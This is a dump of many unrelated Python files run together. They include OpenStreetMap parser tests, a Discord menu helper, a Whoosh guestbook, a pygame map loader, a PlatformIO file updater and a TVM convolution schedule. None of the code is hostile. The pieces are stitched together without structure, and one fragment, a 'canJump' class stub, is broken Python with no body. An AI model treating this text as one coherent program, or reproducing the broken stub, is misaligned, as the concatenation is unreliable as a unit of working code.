                      "uid":"46882", "visible":"true", "version":"1", "changeset":"676636",
                      "timestamp":"2008-09-21T21:37:45Z"})
    assert( str(el) == "Way(298884269,[])" )

def test_Way_wrong_name():
    """Constructing a Way from a non-"way" element raises ValueError."""
    with pytest.raises(ValueError):
        detail.Way("way2", {"id":"298884269", "user":"SvenHRO",
                      "uid":"46882", "visible":"true", "version":"1", "changeset":"676636",
                      "timestamp":"2008-09-21T21:37:45Z"})

def test_Way_extra_attribute():
    """Unknown attributes on a way element raise ValueError."""
    with pytest.raises(ValueError):
        detail.Way("way", {"id":"298884269", "user":"SvenHRO",
                      "uid":"46882", "visible":"true", "version":"1", "changeset":"676636",
                      "timestamp":"2008-09-21T21:37:45Z", "extra":"5"})
def test_Relation():
    """A relation element parses and starts with an empty member list."""
    el = detail.Relation("relation", {"id":"298884269", "user":"SvenHRO",
                      "uid":"46882", "visible":"true", "version":"1", "changeset":"676636",
                      "timestamp":"2008-09-21T21:37:45Z"})
    assert( str(el) == "Relation(298884269,[])" )

def test_Relation_wrong_name():
    """Constructing a Relation from a non-"relation" element raises ValueError."""
    with pytest.raises(ValueError):
        detail.Relation("relation2", {"id":"298884269", "user":"SvenHRO",
                      "uid":"46882", "visible":"true", "version":"1", "changeset":"676636",
                      "timestamp":"2008-09-21T21:37:45Z"})

def test_Relation_extra_attribute():
    """Unknown attributes on a relation element raise ValueError."""
    with pytest.raises(ValueError):
        detail.Relation("relation", {"id":"298884269", "user":"SvenHRO",
                      "uid":"46882", "visible":"true", "version":"1", "changeset":"676636",
                      "timestamp":"2008-09-21T21:37:45Z", "extra":"5"})
def test_Bounds():
    """A bounds element parses all four corner coordinates as floats."""
    el = detail.Bounds("bounds", {"minlat":"54.0889580", "minlon":"12.2487570", "maxlat":"54.0913900", "maxlon":"12.2524800"})
    assert(el.min_latitude == pytest.approx(54.0889580))
    assert(el.min_longitude == pytest.approx(12.2487570))
    assert(el.max_latitude == pytest.approx(54.0913900))
    assert(el.max_longitude == pytest.approx(12.2524800))
def test_Bounds_parse_failures():
    """Wrong element name / extra attributes raise ValueError with a precise message.

    The previous try/except form passed silently when no exception was raised
    at all; pytest.raises makes a missing exception a test failure.
    """
    with pytest.raises(ValueError) as excinfo:
        detail.Bounds("bounds2", {"minlat":"54.0889580", "minlon":"12.2487570", "maxlat":"54.0913900", "maxlon":"12.2524800"})
    assert(str(excinfo.value) == "Should be of type 'bounds'")
    with pytest.raises(ValueError) as excinfo:
        detail.Bounds("bounds", {"extra":"5", "minlat":"54.0889580", "minlon":"12.2487570", "maxlat":"54.0913900", "maxlon":"12.2524800"})
    assert(str(excinfo.value) == "Unexpected extra attributes for 'bounds' element: {'extra'}")
def test_Tag():
    """A tag element exposes its key/value pair and a readable repr."""
    el = detail.Tag("tag", {"k": "traffic_sign", "v": "city_limit"})
    assert(el.key == "traffic_sign")
    assert(el.value == "city_limit")
    assert(str(el) == "Tag(traffic_sign->city_limit)")
def test_Tag_parse_failures():
    """Wrong element name / extra attributes raise ValueError with a precise message.

    The previous try/except form passed silently when no exception was raised
    at all; pytest.raises makes a missing exception a test failure.
    """
    with pytest.raises(ValueError) as excinfo:
        detail.Tag("tag2", {"k": "traffic_sign", "v": "city_limit"})
    assert(str(excinfo.value) == "Should be of type 'tag'")
    with pytest.raises(ValueError) as excinfo:
        detail.Tag("tag", {"extra":"bob", "k": "traffic_sign", "v": "city_limit"})
    assert(str(excinfo.value) == "Unexpected extra attributes for 'tag' element: {'extra'}")
def test_NodeRef():
    """A node-ref element parses its ref as an int and has a readable repr."""
    el = detail.NodeRef("nd", {"ref": "292403538"})
    assert(el.ref == 292403538)
    assert(str(el) == "NodeRef(292403538)")
def test_NodeRef_parse_failures():
    """Wrong element name / unknown attribute raise ValueError with a precise message.

    The previous try/except form passed silently when no exception was raised
    at all; pytest.raises makes a missing exception a test failure.
    """
    with pytest.raises(ValueError) as excinfo:
        detail.NodeRef("nd2", {"ref": "292403538"})
    assert(str(excinfo.value) == "Should be of type 'nd'")
    with pytest.raises(ValueError) as excinfo:
        detail.NodeRef("nd", {"extra": "292403538"})
    assert(str(excinfo.value) == "Unexpected extra attributes for 'nd' element: {'extra'}")
def test_Member():
    """A relation member parses type/ref/role; bad name or extras raise ValueError."""
    el = detail.Member("member", {"type":"node", "ref":"294942404", "role":""})
    assert(el.type == "node")
    assert(el.ref == 294942404)
    assert(el.role == "")
    with pytest.raises(ValueError):
        detail.Member("member2", {"type":"node", "ref":"294942404", "role":""})
    with pytest.raises(ValueError):
        detail.Member("member", {"extra":"jegw", "type":"node", "ref":"294942404", "role":""})

def test_OSM():
    """The osm root element parses version/generator; timestamp is optional."""
    el = detail.OSM("osm", {"version":"0.6", "generator":"CGImap 0.0.2"})
    assert(el.version == "0.6")
    assert(el.generator == "CGImap 0.0.2")
    assert(el.timestamp is None)
    el = detail.OSM("osm", {"version":"0.6", "generator":"osmconvert 0.8.5", "timestamp":"2017-04-25T20:43:28Z"})
    assert(el.version == "0.6")
    assert(el.generator == "osmconvert 0.8.5")
    assert(el.timestamp == datetime.datetime(2017,4,25,20,43,28))
def check_example_output(out):
    """Shared assertions for the parsed contents of tests/example.osm (any compression)."""
    assert(isinstance(out[0], detail.OSM))
    assert(isinstance(out[1], detail.Bounds))
    assert(out[2].osm_id == 298884269)
    assert(out[2].longitude == pytest.approx(12.2482632))
    assert(out[2].latitude == pytest.approx(54.0901746))
    assert(isinstance(out[3], detail.Node))
    assert(out[4].osm_id == 1831881213)
    assert(out[4].subobjs[0].key == "name")
    assert(out[4].subobjs[0].value == "Neu Broderstorf")
    assert(str(out[4].subobjs[1]) == "Tag(traffic_sign->city_limit)")
    assert(isinstance(out[5], detail.Node))
    assert(out[6].osm_id == 26659127)
    assert(out[6].subobjs[0].ref == 292403538)
    assert(str(out[6].subobjs[3]) == "Tag(highway->unclassified)")
    assert(str(out[6].subobjs[4]) == "Tag(name->Pastower Straße)")
    assert(out[7].osm_id == 56688)
    assert(out[7].subobjs[0].ref == 294942404)
    assert(out[7].subobjs[2].type == "way")
    assert(str(out[7].subobjs[4]) == "Tag(name->Küstenbus Linie 123)")
    assert(len(out[7].subobjs) == 10)
    assert(len(out) == 8)
def test_example():
    """Plain-XML example file parses to the expected element sequence."""
    with detail.Parser(os.path.join("tests", "example.osm")) as parser:
        out = list(parser)
    check_example_output(out)

def test_example_xz():
    """xz-compressed example file parses identically to the plain one."""
    with detail.Parser(os.path.join("tests", "example.osm.xz")) as parser:
        out = list(parser)
    check_example_output(out)

def test_example_gz():
    """gzip-compressed example file parses identically to the plain one."""
    with detail.Parser(os.path.join("tests", "example.osm.gz")) as parser:
        out = list(parser)
    check_example_output(out)

def test_example_bz2():
    """bz2-compressed example file parses identically to the plain one."""
    with detail.Parser(os.path.join("tests", "example.osm.bz2")) as parser:
        out = list(parser)
    check_example_output(out)
import json
from typing import Dict, List, Optional, Union
from redbot.core.utils.chat_formatting import text_to_file
from redbot.vendored.discord.ext import menus
from .typehint import UserInfosResult
class MembersPage(menus.ListPageSource):
    """Menu page source for member info embeds, one entry per page.

    Optionally attaches a JSON dump as a file to the very first rendered page.
    """

    def __init__(self, data, *, json: Optional[Dict[str, Union[List[dict], str]]] = None):
        # pages whose footer has already been amended with "Page x/y"
        self.__cache_edit: Dict[int, bool] = {}
        # becomes True after the first page render; gates the one-time file attach
        self.__was_initialized: bool = False
        # expected keys (when provided): "data" and "filename" — TODO confirm against callers
        self.__json: Optional[Dict[str, Union[List[dict], str]]] = json
        super().__init__(data, per_page=1)

    async def format_page(self, menu: menus.MenuPages, entry: UserInfosResult):
        """Render one page; append the page counter to the footer exactly once per page."""
        if menu.current_page not in self.__cache_edit:
            foot_but_not_the_sport_just_the_footer = entry["embed"].footer
            entry["embed"].set_footer(
                text=foot_but_not_the_sport_just_the_footer.text
                + f"\nPage {menu.current_page + 1}/{self.get_max_pages()}",
                icon_url=foot_but_not_the_sport_just_the_footer.icon_url,
            )
            self.__cache_edit[menu.current_page] = True
        if self.__was_initialized:
            return {"content": entry["content"], "embed": entry["embed"]}
        # First render: attach the JSON file (if any), then mark as initialized.
        # try/finally guarantees the flag is set even if text_to_file raises.
        try:
            if self.__json:
                return {
                    "content": entry["content"],
                    "embed": entry["embed"],
                    "file": text_to_file(self.__json["data"], filename=self.__json["filename"]),
                }
            else:
                return {"content": entry["content"], "embed": entry["embed"], "file": None}
        finally:
            self.__was_initialized = True
|
#! /usr/bin/python3
"""Download the MIT voting dataset from Google Drive into mit_voting.csv."""
import os
import subprocess

# subprocess.run with an argument list avoids shell string interpolation and,
# unlike os.system, raises if the download fails (check=True).
subprocess.run(
    [
        "wget",
        "--no-check-certificate",
        "https://docs.google.com/uc?export=download&id=140d4U-YJs7pnSYQ3Q1nEIX5NKbUNz-ze",
        "-O",
        "mit_voting.csv",
    ],
    check=True,
)
#!/usr/bin/env python
"""Management entry point: run the Flask app through Flask-Script's Manager."""
import os
from flask_script import Manager
from server import create_app

# CONFIG selects the configuration profile; unset *or empty* falls back to
# 'default' (the `or` is deliberate — .get with a default would keep "").
app = create_app(os.environ.get('CONFIG') or 'default')
manager = Manager(app)

if __name__ == '__main__':
    manager.run()
from typing import Dict
from typing import List
import pytest
from pytest_aiomoto.aws_lambda import aws_lambda_src
from pytest_aiomoto.aws_lambda import aws_lambda_zip
from pytest_aiomoto.aws_lambda import lambda_handler
def test_lambda_handler_echo():
    """The handler echoes the event back in the response body with status 200."""
    event = {"i": 0}
    result = lambda_handler(event=event, context={})
    assert isinstance(result, Dict)
    assert result['statusCode'] == 200
    body = result['body']
    assert body == event

def test_lambda_handler_too_large():
    """The 'too-large' action yields a 1M-element body (exceeds the lambda payload limit)."""
    event = {"action": "too-large"}
    result = lambda_handler(event=event, context={})
    assert isinstance(result, Dict)
    assert result['statusCode'] == 200
    body = result['body']
    assert body
    assert isinstance(body, List)
    assert isinstance(body[0], str)
    assert body[0] == "xxx"
    assert len(body) == 1000000

def test_lambda_handler_raises():
    """The 'runtime-error' action propagates a RuntimeError to the caller."""
    event = {"action": "runtime-error"}
    with pytest.raises(RuntimeError):
        lambda_handler(event=event, context={})

def test_aws_lambda_src():
    """The fixture source code is a string containing a lambda_handler definition."""
    lambda_src = aws_lambda_src()
    assert isinstance(lambda_src, str)
    assert 'def lambda_handler' in lambda_src

def test_aws_lambda_zip():
    """The zipped fixture is returned as raw bytes."""
    lambda_zip = aws_lambda_zip()
    assert isinstance(lambda_zip, bytes)
|
import cgi
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from whoosh import store
from whoosh.fields import Schema, STORED, ID, KEYWORD, TEXT
from whoosh.index import getdatastoreindex
from whoosh.qparser import QueryParser, MultifieldParser
import logging
SEARCHSCHEMA = Schema(content=TEXT(stored=True))
class MainPage(webapp.RequestHandler):
    """Landing page: search form plus the guestbook submission form."""

    def get(self):
        self.response.out.write('<html><body>')
        # Search form. The original emitted </body></html> right after this
        # form and then kept writing, producing content outside the document;
        # the closing tags are now written once, at the end.
        self.response.out.write("""
          <form action="/search" method="get">
            <div><input name="query" type="text" value=""><input type="submit" value="Search"></div>
          </form>""")
        # Write the submission form and the footer of the page
        self.response.out.write("""
          <form action="/sign" method="post">
            <div><textarea name="content" rows="3" cols="60"></textarea></div>
            <div><input type="submit" value="Sign Guestbook"></div>
          </form>
        </body>
      </html>""")
class SearchPage(webapp.RequestHandler):
    """Run a full-text query against the datastore index and list the hits."""

    def get(self):
        self.response.out.write('<html><body>')
        # Search form. The original emitted </body></html> here, so the search
        # results and the second form landed outside the document; the closing
        # tags are now written once, at the end.
        self.response.out.write("""
          <form action="/search" method="get">
            <div><input name="query" type="text" value=""><input type="submit" value="Search"></div>
          </form>""")
        ix = getdatastoreindex("hello", schema=SEARCHSCHEMA)
        parser = QueryParser("content", schema = ix.schema)
        q = parser.parse(self.request.get('query'))
        results = ix.searcher().search(q)
        for result in results:
            # escape indexed content before embedding it in the page
            self.response.out.write('<blockquote>%s</blockquote>' %
                                    cgi.escape(result['content']))
        # Write the submission form and the footer of the page
        self.response.out.write("""
          <form action="/sign" method="post">
            <div><textarea name="content" rows="3" cols="60"></textarea></div>
            <div><input type="submit" value="Sign Guestbook"></div>
          </form>
        </body>
      </html>""")
class Guestbook(webapp.RequestHandler):
    """Handle guestbook submissions by indexing the posted content."""

    def post(self):
        index = getdatastoreindex("hello", schema=SEARCHSCHEMA)
        index_writer = index.writer()
        index_writer.add_document(content=u"%s" % self.request.get('content'))
        index_writer.commit()
        self.redirect('/')
# URL routing for the WSGI application.
application = webapp.WSGIApplication(
                                     [('/', MainPage),
                                      ('/search', SearchPage),
                                      ('/sign', Guestbook)],
                                     debug=True)

def main():
    # Entry point invoked by the App Engine runtime.
    run_wsgi_app(application)

if __name__ == "__main__":
    main()
|
import requests
import itertools
import configparser
import os

# Test configuration comes from the INI file named by PARACHUTE_CONFIG_FILE.
config = configparser.ConfigParser()
config.read(os.environ['PARACHUTE_CONFIG_FILE'])
HOST = config['tests']['host']
PORT = config['tests']['port']
ADDRESS = 'http://{}:{}'.format(HOST, PORT)
API_ROUTE = config['routes']['api']
USER_API_KEY = config['tests']['small_user_api_key']

# Monotonically increasing JSON-RPC request ids.
id_generator = itertools.count()
def test_export():
    """Request a credit-history export over JSON-RPC and save it to export.xlsx."""
    params = dict(
        id=next(id_generator),
        jsonrpc='2.0',
        method='export_credit_history',
        params=dict(
            v='2.0',
            api_key=USER_API_KEY
        )
    )
    response = requests.post(ADDRESS + API_ROUTE + '?format=jsonrpc',
                             json=params)
    # Fail loudly instead of silently writing an HTML error page into the
    # .xlsx file when the server responds with a non-2xx status.
    response.raise_for_status()
    print('Headers are', response.headers)
    file = 'export.xlsx'
    with open(file, mode='wb') as f:
        for chunk in response.iter_content():
            f.write(chunk)
if __name__ == '__main__':
    # Allow running this file directly as a smoke test.
    test_export()
|
# Module authorship metadata.
__author__ = ["Francisco Clavero"]
__email__ = ["fcoclavero32@gmail.com"]
__status__ = "Prototype"
from nltk import word_tokenize
def remove_stopwords_set(sentence, stop_words):
    """
    Remove stop words from the given text. Assumes clean text separated by spaces.
    (The previous docstring claimed "lemmatized" output — a copy/paste error;
    this function only filters stop words.)
    :param sentence: the text from which stopwords will be removed
    :type: str
    :param stop_words: a set with stop words for the same language as the sentence
    :type: set
    :return: the sentence with all stop words removed
    :type: str
    """
    return ' '.join(w for w in word_tokenize(sentence) if w not in stop_words)
|
"Memoization to the rescue"
'''
Memoization is a technique in which you store the results of computational tasks when
they are completed so that when you need them again, you can look them up instead
of needing to compute them a second (or millionth) time.
'''
from typing import Dict
memo: Dict[int, int] = {0: 0, 1: 1}  # our base cases


def fib3(n: int) -> int:
    """Return the nth Fibonacci number, caching results in the module-level memo."""
    if n in memo:
        return memo[n]
    result = fib3(n - 1) + fib3(n - 2)
    memo[n] = result  # memoization
    return result
if __name__ == "__main__":
    # Demonstrate that the memoized version handles large n instantly.
    print(fib3(5))
    print(fib3(50))
"""
A call to fib3(20) will result in just 39 calls of fib3() as opposed to the 21,891 of
fib2() resulting from the call fib2(20). memo is prefilled with the earlier base cases of
0 and 1, saving fib3() from the complexity of another if statement.
"""
|
class Solution:
def canJump(self, nums: List[int]) -> bool:
|
from .plotter import Plotter
from .evaluator import Evaluator

# Public API of the package: re-export the two entry-point classes.
__all__ = [
    'Plotter',
    'Evaluator',
]
|
import pygame as pg
import json as js

# Map size in tiles (n columns x m rows) at 32 px per tile.
n = 32
m = 26
Ancho = n*32  # window width in pixels
Alto = m*32   # window height in pixels
class Colisionable(pg.sprite.Sprite):
    """A solid (collidable) tile sprite placed at pixel coordinates (x, y)."""

    def __init__(self, img, x, y):
        pg.sprite.Sprite.__init__(self)
        self.image = img
        self.rect = self.image.get_rect()
        self.rect.topleft = (x, y)
class Otros(pg.sprite.Sprite):
    """A non-collidable (decorative) tile sprite placed at pixel coordinates (x, y)."""

    def __init__(self, img, x, y):
        pg.sprite.Sprite.__init__(self)
        self.image = img
        rect = self.image.get_rect()
        rect.x, rect.y = x, y
        self.rect = rect
class Mapa(object):
    """Loader for a Tiled JSON map: splits layers into grids and spawns sprites."""

    def __init__(self, archivo):
        """Parse the map file and prepare per-layer tile-id grids plus the tile list.

        :param archivo: path to the Tiled JSON export
        """
        with open(archivo) as J_archivo:
            self.base = js.load(J_archivo)
        self.lsOtros2 = []
        self.lsOtros = []
        self.lsDetail = []
        self.lsCosasC = []
        self.lsCosasNC = []
        self.lsRuinas = []
        self.lsSuelo = []
        # Pick out the known layers by name; unknown layers are ignored.
        for capa in self.base['layers']:
            nombre = capa['name']
            if nombre == 'Otros 2':
                self.lsOtros2 = capa['data']
            elif nombre == 'Otros':
                self.lsOtros = capa['data']
            elif nombre == 'Detalles (encima)':
                self.lsDetail = capa['data']
            elif nombre == 'Otras Cosas C':
                self.lsCosasC = capa['data']
            elif nombre == 'Otras Cosas NC':
                self.lsCosasNC = capa['data']
            elif nombre == 'Ruinas Col':
                self.lsRuinas = capa['data']
            elif nombre == 'Suelo':
                self.lsSuelo = capa['data']
        self.AnchoF = self.base['width']
        self.AltoF = self.base['height']
        self.lyOtros2 = self.Separar(self.lsOtros2, self.AnchoF)
        self.lyOtros = self.Separar(self.lsOtros, self.AnchoF)
        self.lyDetail = self.Separar(self.lsDetail, self.AnchoF)
        self.lyCosasC = self.Separar(self.lsCosasC, self.AnchoF)
        self.lyCosasNC = self.Separar(self.lsCosasNC, self.AnchoF)
        self.lyRuinas = self.Separar(self.lsRuinas, self.AnchoF)
        self.lySuelo = self.Separar(self.lsSuelo, self.AnchoF)
        self.lstiles = self.Tiles()

    def Mapeo(self, Colisionables, NoColisionables):
        """Build sprites for every layer and add them to the given groups.

        Fixes vs. the original:
        - the 'Otros 2' layer indexed self.lstiles[e] while every other layer
          used e - 1 (Tiled ids are 1-based); it now uses e - 1 as well.
        - the 'Otras Cosas C' layer called Colisionables(...) — the sprite
          *group* parameter — instead of the Colisionable class, which would
          raise TypeError as soon as that layer had a tile.
        """
        self._poblar(self.lyOtros2, Otros, NoColisionables)
        self._poblar(self.lyOtros, Otros, NoColisionables)
        self._poblar(self.lyDetail, Otros, NoColisionables)
        self._poblar(self.lyCosasC, Colisionable, Colisionables)
        self._poblar(self.lyCosasNC, Otros, NoColisionables)
        self._poblar(self.lyRuinas, Colisionable, Colisionables)
        self._poblar(self.lySuelo, Otros, NoColisionables)

    def _poblar(self, capa, clase, grupo):
        """Instantiate `clase` for each non-zero tile id in `capa`, adding it to `grupo`."""
        nf = 0
        for fila in capa:
            ne = 0
            for e in fila:
                if e != 0:
                    # Tiled stores ids 1-based; 0 means "no tile here".
                    grupo.add(clase(self.lstiles[e - 1], nf, ne))
                ne += 32
            nf += 32

    def Tiles(self):
        """Collect the sliced tileset images for all tilesets, in order."""
        l = []
        for i in self.base['tilesets']:
            arc = i['image']
            lr = Recortar(arc, 32, 64)
            # NOTE(review): Recortar returns a list of lists (columns of
            # tiles), so the entries appended here are lists rather than
            # single surfaces — verify the intended nesting against how
            # lstiles is indexed in _poblar.
            for t in lr:
                l.append(t)
        return l

    def Separar(self, lista, ancho):
        """Split a flat tile-id list into rows of `ancho` entries each."""
        cont = 0
        m = []
        linea = []
        for i in lista:
            linea.append(i)
            cont += 1
            if cont == ancho:
                m.append(linea)
                linea = []
                cont = 0
        return m
def Recortar(archivo, an, al):
    """Load a tileset image and slice it into an `an` x `al` grid of subsurfaces.

    :param archivo: path to the tileset image
    :param an: number of slices across the image width
    :param al: number of slices down the image height
    :return: nested list of pygame subsurfaces
    """
    fondo = pg.image.load(archivo).convert_alpha()
    img_ancho, img_alto = fondo.get_size()
    # Integer division: subsurface rects need whole pixels; plain '/' yields
    # floats on Python 3.
    corte_x = img_ancho // an
    corte_y = img_alto // al
    m = []
    for i in range(an):
        fila = []
        for j in range(al):
            cuadro = [i * corte_x, j * corte_y, corte_x, corte_y]
            fila.append(fondo.subsurface(cuadro))
        m.append(fila)
    return m
if __name__ == '__main__':
    pg.init()
    Pantalla = pg.display.set_mode([Ancho, Alto])
    Colisionables = pg.sprite.Group()
    NoColisionables = pg.sprite.Group()
    Nivel = Mapa('untitledmap.json')
    Nivel.Mapeo(Colisionables, NoColisionables)
    Running = True
    while Running:
        for event in pg.event.get():
            if event.type == pg.QUIT:
                Running = False
            if event.type == pg.KEYDOWN:
                if event.key == pg.K_ESCAPE:
                    Running = False
        Colisionables.draw(Pantalla)
        NoColisionables.draw(Pantalla)
        # Without flipping the back buffer nothing ever appears on screen.
        pg.display.flip()
    pg.quit()
|
import requests
import os
import filecmp
# the following is needed, because at this stage PLATFORMIO_HOME_DIR is undefined
from os.path import expanduser

home = expanduser("~")
# os.path.join handles the separator portably on every OS; the old
# '\.platformio' literal relied on '\.' not being a recognized escape
# (a DeprecationWarning on Python 3).
basePath = os.path.join(home, '.platformio')
patchPath = basePath + '/packages/framework-mbed/targets/TARGET_NXP/TARGET_LPC11U6X/device/TOOLCHAIN_GCC_ARM/TARGET_LPC11U68/'


def _update_from_repo(url, target, backup, tmp, label):
    """Download `url` to `tmp`, back up the original once, replace `target` when changed.

    Fixes vs. the original: file handles are closed via `with` (the old
    `open(...).write(...)` leaked them), and the backup rename is guarded by
    an existence check for both files (the startup branch used to crash when
    the original file was missing).
    """
    r = requests.get(url, allow_redirects=True, headers={'Cache-Control': 'no-cache'})
    with open(tmp, 'wb') as f:
        f.write(r.content)
    # check if a backup exists; first run creates one
    if not os.path.exists(backup) and os.path.exists(target):
        print('Creating backup of original ' + label)
        os.rename(target, backup)
    # compare the downloaded .tmp file to the existing file
    if os.path.exists(target):
        if not filecmp.cmp(tmp, target):
            # they are different, so update
            print('New version found. Saving it as ' + label)
            with open(target, 'wb') as f:
                f.write(r.content)
    else:
        # missing completely, so save
        print('Saving ' + label)
        with open(target, 'wb') as f:
            f.write(r.content)
    # delete the temporary file
    if os.path.exists(tmp):
        os.remove(tmp)


# get the latest startup file from github
print("Comparing startup_LPC11U68.cpp to PokittoLib repository...")
_update_from_repo(
    'https://raw.githubusercontent.com/pokitto/PokittoIO/master/src/hal/LPC11U68/mbed_patches/arm_gcc/startup_LPC11U68.cpp',
    patchPath + 'startup_LPC11U68.cpp',
    patchPath + 'startup_LPC11U68.bak',
    patchPath + 'startup_LPC11U68.tmp',
    'startup_LPC11U68.cpp')

# get the latest linker file from github
print("Comparing linker file LPC11U68.ld to PokittoLib repository...")
_update_from_repo(
    'https://raw.githubusercontent.com/pokitto/PokittoIO/master/src/hal/LPC11U68/mbed_patches/arm_gcc/LPC11U68.ld',
    patchPath + 'LPC11U68.ld',
    patchPath + 'LPC11U68.bak',
    patchPath + 'LPC11U68.tmp',
    'LPC11U68.ld')
from tvm import te
from tvm.topi.utils import get_stages_and_cfgs
from .libxsmm_intrin import intrin_libxsmm_brgemm
from .schedule_utils import get_layer_cfg
def schedule_conv_conv_fused_nchwc(cfg, outs):
    """Build a TE schedule for two fused NCHWc convolutions (conv -> conv).

    The second layer's output is tiled; the first layer's output (and any
    padding stages) is computed per-tile inside it, and both reductions are
    tensorized with libxsmm batch-reduce GEMM (BRGEMM) micro-kernels.

    NOTE(review): `cfg` is not read in this body — the tile/split factors
    below are hard-coded for one workload ('res_3x'); confirm before reusing
    on other shapes.

    :param cfg: autotuning config (currently unused here)
    :param outs: output tensor or list of output tensors
    :return: the normalized te.Schedule
    """
    outs = [outs] if isinstance(outs, te.tensor.Tensor) else outs
    s = te.create_schedule([x.op for x in outs])
    stage_dict, layer_output_dict, _, _, post_ops, hasPaddedInput = get_stages_and_cfgs(s, outs)
    inputs_cfg, filters_cfg, outputs_cfg = get_layer_cfg()
    ######## Searchable parameters
    # -------------------- res_3x
    output_step_tile_size_h = 1
    output_step_tile_size_w = 28
    step_num_h = 28
    step_num_w = 2
    output_tile_0_h = 14
    output_tile_0_w = 2
    c_split2 = 4
    reduce_split1 = 2
    reduce_split2 = 2
    # -------------------- conv3_conv3_test_tiny
    # output_step_tile_size_h = 1
    # output_step_tile_size_w = 8
    # step_num_h = 2
    # step_num_w = 2
    # output_tile_0_h = 2
    # output_tile_0_w = 1
    # c_split2 = 4
    # reduce_split1 = 2
    # reduce_split2 = 2
    # --------------------
    output_tile_size_h = output_step_tile_size_h * step_num_h
    output_tile_size_w = output_step_tile_size_w * step_num_w
    # --------------------
    ######## Global output
    n, oc_chunk, h, w, oc = s[layer_output_dict['Layer_1']].op.axis
    oc_chunk_o, oc_chunk_i_1 = s[layer_output_dict['Layer_1']].split(oc_chunk, factor=c_split2)
    ht, wt, h, w = s[layer_output_dict['Layer_1']].tile(h, w, x_factor=output_tile_size_h, y_factor=output_tile_size_w)
    s[layer_output_dict['Layer_1']].reorder(n, oc_chunk_o, ht, wt, oc_chunk_i_1, h, w, oc)
    # Fuse the outer axes into a single axis for parallelization.
    fused_blx = s[layer_output_dict['Layer_1']].fuse(n, oc_chunk_o, ht, wt)
    s[layer_output_dict['Layer_1']].parallel(fused_blx)
    if post_ops[1]:
        s[layer_output_dict['Layer_1']].vectorize(oc)
        s[stage_dict['Output_1']].compute_at(s[layer_output_dict['Layer_1']], fused_blx)
    _, oc_chunk_i_1, h, w, oc = s[stage_dict['Output_1']].op.axis
    if post_ops[1] != 'bias':
        s[stage_dict['Output_1_BiasAdd']].compute_inline()
    ho_1, wo_1, h, w = s[stage_dict['Output_1']].tile(h, w, x_factor=output_step_tile_size_h, y_factor=output_step_tile_size_w)
    ic_chunk, ry, rx, ic = s[stage_dict['Output_1']].op.reduce_axis
    ic_chunk_o_1, ic_chunk_i = s[stage_dict['Output_1']].split(ic_chunk, factor=reduce_split2)
    s[stage_dict['Output_1']].reorder(oc_chunk_i_1, ic_chunk_o_1, ho_1, wo_1, h, ic_chunk_i, ry, rx, w, oc, ic)
    # Choose where to anchor the BRGEMM intrinsic: for 1x1 stride-1 filters
    # with a full-width step tile, tensorize over h; otherwise over ic_chunk_i.
    if (((filters_cfg['Layer_1'].H == 1 and filters_cfg['Layer_1'].W == 1 and \
            filters_cfg['Layer_1'].stride_h == 1 and filters_cfg['Layer_1'].stride_w == 1)) and \
        (step_num_h > 1 and output_step_tile_size_w == outputs_cfg['Layer_1'].W)): # HM > 1 & WI = OW (small W)
        # print('small: bind to h')
        tensorize_axis = h
        block_output_height = output_step_tile_size_h
    else:
        # print('big: bind to ic_chunk_i')
        tensorize_axis = ic_chunk_i
        block_output_height = 1
    libxsmm_tensorize = intrin_libxsmm_brgemm(
                                                ic.dom.extent,                      # k of brgemm   -> ic
                                                oc.dom.extent,                      # n of brgemm   -> oc
                                                output_step_tile_size_w,            # m of brgemm   -> w
                                                filters_cfg['Layer_1'].W,           #               -> rx
                                                filters_cfg['Layer_1'].H,           #               -> ry
                                                reduce_split2,                      #               -> ic_chunk_i
                                                block_output_height,                #               -> hi
                                                filters_cfg['Layer_1'].stride_h,
                                                filters_cfg['Layer_1'].stride_w,
                                                inputs_cfg['Layer_1'].C)
    s[stage_dict['Output_1']].tensorize(tensorize_axis, libxsmm_tensorize)
    ######## Intermediate output
    if hasPaddedInput[1]:
        s[stage_dict['FusedConv2D_PaddedInput_1']].compute_at(s[stage_dict['Output_1']], fused_blx)
    s[layer_output_dict['Layer_0']].compute_at(s[stage_dict['Output_1']], fused_blx)
    if hasPaddedInput[0]:
        s[stage_dict['FusedConv2D_PaddedInput_0']].compute_at(s[stage_dict['Output_1']], fused_blx)
    n, oc_chunk, h, w, oc = s[layer_output_dict['Layer_0']].op.axis
    if post_ops[0]:
        s[layer_output_dict['Layer_0']].vectorize(oc)
        s[stage_dict['Output_0']].compute_at(s[stage_dict['Output_1']], wo_1)
    _, oc_chunk, h, w, oc = s[stage_dict['Output_0']].op.axis
    if post_ops[0] != 'bias':
        s[stage_dict['Output_0_BiasAdd']].compute_inline()
    ho, wo, h, w = s[stage_dict['Output_0']].tile(h, w, x_factor=output_tile_0_h, y_factor=output_tile_0_w)
    ic_chunk, ry, rx, ic = s[stage_dict['Output_0']].op.reduce_axis
    ic_chunk_o, ic_chunk_i = s[stage_dict['Output_0']].split(ic_chunk, factor=reduce_split1)
    s[stage_dict['Output_0']].reorder(oc_chunk, ic_chunk_o, ho, wo, h, ic_chunk_i, ry, rx, w, oc, ic)
    # TODO: Deal with this. Currently assuming the first layer is never 1x1
    if (((filters_cfg['Layer_0'].H == 1 and filters_cfg['Layer_0'].W == 1 and \
            filters_cfg['Layer_0'].stride_h == 1 and filters_cfg['Layer_0'].stride_w == 1)) and \
        (step_num_h > 1 and output_step_tile_size_w == outputs_cfg['Layer_0'].W)): # HM > 1 & WI = OW (small W)
        # print('small: bind to h')
        tensorize_axis = h
        block_output_height = output_step_tile_size_h
    else:
        # print('big: bind to ic_chunk_i')
        tensorize_axis = ic_chunk_i
        block_output_height = 1
    libxsmm_tensorize = intrin_libxsmm_brgemm(
                                                ic.dom.extent,                      # k of brgemm   -> ic
                                                oc.dom.extent,                      # n of brgemm   -> oc
                                                output_tile_0_w,                    # m of brgemm   -> w
                                                filters_cfg['Layer_0'].W,           #               -> rx
                                                filters_cfg['Layer_0'].H,           #               -> ry
                                                reduce_split1,                      #               -> ic_chunk_i
                                                block_output_height,                #               -> hi
                                                filters_cfg['Layer_0'].stride_h,
                                                filters_cfg['Layer_0'].stride_w,
                                                inputs_cfg['Layer_0'].C)
    s[stage_dict['Output_0']].tensorize(tensorize_axis, libxsmm_tensorize)
    s = s.normalize()
    return s
|
# Vulyk tagging-plugin asset configuration.
TASK_NAME = 'TaggingTask'  # task type name this plugin registers
JS_ASSETS = ['']  # source JS files to bundle (empty placeholder entry)
JS_ASSETS_OUTPUT = 'scripts/vulyk-tagging.js'  # bundled JS output path
